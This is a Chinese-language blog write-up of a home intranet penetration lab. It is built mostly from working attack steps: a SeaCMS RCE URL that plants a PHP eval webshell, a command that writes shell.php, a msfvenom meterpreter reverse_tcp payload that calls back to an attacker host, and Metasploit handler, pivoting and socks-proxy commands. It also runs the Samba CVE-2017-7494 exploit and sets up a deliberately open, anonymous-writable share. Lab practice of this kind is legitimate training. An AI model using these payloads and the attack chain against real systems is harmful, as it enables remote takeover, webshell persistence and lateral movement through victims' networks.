一次简单的内网渗透环境搭建及练手

1、搭建环境:

一次简单的内网渗透环境搭建及练手_第1张图片

内网中有一台win server2008服务器、一台linux主机,一台windows或linux主机

这里主要的目标是获得PC1的shell

2、信息搜集

nmap扫一下该服务器:

一次简单的内网渗透环境搭建及练手_第2张图片


先访问一下80端口,发现有一个网站页面

一次简单的内网渗透环境搭建及练手_第3张图片


先用nikto扫一下该网站:发现了网站的架构,还有一些网站的路径,没有很有用的信息

一次简单的内网渗透环境搭建及练手_第4张图片


翻看一下该网站页面,发现是海洋cms,但不知道具体版本,网上搜一下有没有相关漏洞,发现有一个seacms9.92的RCE

一次简单的内网渗透环境搭建及练手_第5张图片


具体代码审计百度。

3、漏洞应用

1)得到服务器的shell

1)先上传一个一句话木马,生成mysql错误记录在mysql_error_trace.php里
  http://127.0.0.1/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_]);?%3E
2)然后访问该页面,并验证poc
http://127.0.0.1/data/mysqli_error_trace.php?_=phpinfo();
发现可以执行命令
3)然后再写入一个一句话webshell页面,用蚁剑连接
http://localhost/CMS/data/mysqli_error_trace.php?_=system(%27echo%20^%3C?php%20@eval($_POST[123]);%20?^%3E%20%3Eshell.php%27);

原理:刚好在mysql_error_trace.php里构成一句话木马

一次简单的内网渗透环境搭建及练手_第6张图片

一次简单的内网渗透环境搭建及练手_第7张图片


写入一个shell.php,然后蚁剑连接(这里服务器角色直接是管理员。。)

一次简单的内网渗透环境搭建及练手_第8张图片

2)得到meterpreter shell

为了后续渗透工作,上传一个meterpreter木马(免杀暂时未做)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.2 LPORT=4444 -f exe -o seacms.exe

上传后,配置msf监听,并在服务器上运行meterpreter木马,弹回一个shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.1.2
set LPORT 4444
exploit

一次简单的内网渗透环境搭建及练手_第9张图片


木马传成功,先msf监听,然后用蚁剑里运行传上去的木马:

一次简单的内网渗透环境搭建及练手_第10张图片

一次简单的内网渗透环境搭建及练手_第11张图片

一次简单的内网渗透环境搭建及练手_第12张图片

3)内网渗透

查找本地网段:run get_local_subnets

使用msf的辅助模块扫描存活主机

run autoroute -s 192.168.1.0/24
run autoroute -p
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

一次简单的内网渗透环境搭建及练手_第13张图片

nmap扫描(使用metasploit的socks4代理模块)

msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.
Auxiliary action:
   Name   Description
   ----   -----------
   Proxy  
msf auxiliary(socks4a) > set srvhost 10.0.1.2
srvhost => 10.0.1.2
msf auxiliary(socks4a) > set srvport 8888
srvport => 10.0.1.2
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > netstat -antp | grep 8888
[*] exec: netstat -antp | grep 8888
tcp        0      10.0.1.2:8888            0.0.0.0:*               LISTEN      3626/ruby       
msf auxiliary(socks4a) >

用文本编辑器打开/etc/proxychains.conf,在文件的最后一行添加新创建的socks4代理服务器

--- snippet ---
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  10.0.1.2 8888

proxychains nmap -sT -sV -Pn 192.168.1.5

一次简单的内网渗透环境搭建及练手_第14张图片

一次简单的内网渗透环境搭建及练手_第15张图片

发现第二个linux目标的139、445端口是打开的(这里利用的是samba的cve-2017-7494)

前面已经添加了到目标网段的路由,所以直接使用msf里的攻击模块

search cve-2017-7494
use exploit/linux/samba/is_known_pipename
show options
set rhost 192.168.1.5
exploit

得到的是unix/shell,尝试使用shell_to_meterpreter升级为meterpreter shell,发现不能成功。应该是跟这个exploit有关

use post/multi/manage/shell_to_meterpreter
set session sid
run

未完待续....



附录

1、配置cve-2017-7494漏洞环境

影响版本:
Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

查看samba版本:samba --version

首先,我们创建一个共享目录,并且赋予写权限,为了简便直接赋予全部权限:

mkdir /home/share
chmod 777 /home/share

然后修改配置文件/etc/samba/smb.conf, 可在配置文件最后添加如下内容:

[myshare]
comment=smb share test
browseable=yes #可读
writeable=yes #可写
path=/home/share  #设置目录(上一步创建的共享目录)
public = yes #允许匿名登录

samba服务启停:

/etc/init.d/smbd start  #开启
/etc/init.d/smbd stop   #关闭
/etc/init.d/smbd restart #重启
或:
service smbd start
service smbd stop
service smbd restart

https://www.freebuf.com/articles/network/125278.html)

参考:

https://zhuanlan.zhihu.com/p/35321152

https://www.cnblogs.com/Hi-blog/p/7782356.html

2、Metasploit中将shell升级为metepreter shell

use post/multi/manage/shell_to_meterpreter
set session sid
run

也可以使用sessions -u sessionsID 直接升级

3、一些其他基础操作

1)在meterpreter shell中查看靶机所在网段:run get_local_subnets

2)添加路由,使攻击机能通过跳板机访问内网(下面的命令在meterpreter shell里使用)
run autoroute -s 192.168.1.0/24

3)arp_scanner扫描存活主机
run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24

portscan
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

4)当添加路由后可以使用msf的一些辅助模块进行一些扫描,但可能不准确或全面,所以可以使用sock4a代理,使用nmap扫描
msf> use auxiliary/server/socks4a 
msf> set srvhost 127.0.0.1
msf> set srvport 1080
msf> run

然后修改本机的proxychains配置:vi /etc/proxychains.conf
在文末添加:socks4 127.0.0.1 1080

然后就可以使用:proxychains namp -sV -Pn 192.168.1.5

你可能感兴趣的:(一次简单的内网渗透环境搭建及练手)